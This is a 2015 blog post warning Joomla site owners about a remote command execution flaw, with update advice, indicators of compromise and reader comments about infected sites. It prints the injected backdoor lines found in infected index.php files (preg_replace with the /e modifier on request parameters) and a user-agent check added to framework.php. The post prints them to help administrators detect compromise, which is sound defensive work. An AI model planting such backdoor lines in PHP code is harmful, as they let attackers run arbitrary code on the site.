Very Important: Update to Joomla 3.4.6 Immediately!

There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla

If you are using Joomla 3, please update immediately to Joomla 3.4.6.

Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.

How to Check

I have quite a number of friends who are being hit by this.

Some signs of being attacked are as follows. Take at look at your <Joomla_Root_Folder>/index.php OR <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site is being hit.

  1. The following from <Joomla_Root_Folder>/index.php:
  2. <?php
    
    if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
    
    if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
    
    if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}
    
    if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
    
    if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}
    
    
    /**
     * @package    Joomla.Site
     *
     * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license    GNU General Public License version 2 or later; see LICENSE.txt
     */
    

  3. The following from <Joomla_Root_Folder>/includes/framework.php:
  4. <?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_
    FOR"], "JDatabaseDriverMysqli") !== false) exit;
    /**
     * @package    Joomla.Site
     *
     * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license    GNU General Public License version 2 or later; see LICENSE.txt
     */
    

How to Update

Please apply the following patch immediately:

  • Joomla 3 and above: Joomla 3.4.6.
  • Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.

  • Old (unsupported) versions 1.5.x and 2.5.x: You may apply the security hotfixes here. This article from OSTraining explains how to apply them.

Related Articles

Comments   

-2 # Brian 2015-12-28 11:15
Just hand this happen to me, thought it was a small problem at first because I couldn't access most things in the back end, getting a 500 error, check the php logs and was getting "syntax error, unexpected ':' in \sidebars\submenu.php on line 101" So I check that guy out and see very similar lines of code to the ones you have showing for index.php, Google search it and get this https://github.com/joomla/joomla-cms/issues/8741 So the first comment says your sites been hacked, So do some more searching and see some other people with similar problems, they said they just changed the file to the one on the Joomla Github, but I know that's clearly not what they used to change the files, So I run a windows search on my website for the files modified by date, and get about 20 files that were modified on the same date with the top being modified with those lines. The first two were different though which were cookiestest.php and defaults.php. default.php could modify other files..
Reply | Reply with quote | Quote
+3 # kksou 2015-12-29 01:10
Hi Brian,

Yes, it's actually quite "scary" to see so many files being changed. But no worries, if you have a full backup some time before Dec 10, restore the whole site and update your Joomla to 3.4.6, it should be fine.

Warm Regards,
/kksou
Reply | Reply with quote | Quote

Add comment


Security code
Refresh